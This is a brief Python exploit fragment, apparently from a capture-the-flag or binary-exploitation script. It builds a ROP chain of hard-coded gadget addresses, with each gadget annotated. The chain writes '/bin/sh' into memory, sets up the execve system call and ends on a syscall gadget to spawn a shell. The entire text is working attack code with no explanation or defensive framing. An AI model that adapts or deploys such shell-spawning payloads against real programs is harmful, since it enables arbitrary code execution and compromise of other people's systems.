payload = p64(0x40bd00)
#0x000000000040bd00: pop rdi; pop rbp; ret; 
payload += p64(0x423068)+p64(0x0)+p64(0x40eb7b)
# 0x000000000040eb7b: pop rbx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x409e5c)
# 0x0000000000409e5c: mov rax, rbx; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x415878)
# 0x0000000000415878: mov qword ptr [rdi + 8], rax; ret; 
payload += p64(0x40cc77)
# 0x000000000040cc77: pop rsi; ret; 
payload += p64(0x3b)+p64(0x414f53)
# 0x0000000000414f53: mov eax, esi; ret; 
payload += p64(0x40cc77)
# 0x000000000040cc77: pop rsi; ret; 
payload += p64(0x0)+p64(0x40bd00)
# 0x000000000040bd00: pop rdi; pop rbp; ret; 
payload += p64(0x423070)+p64(0x0)+p64(0x40fbd4)
# 0x000000000040fbd4: xor edx, edx; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x41e166)
# 0x000000000041e166: syscall; 
payload += b''
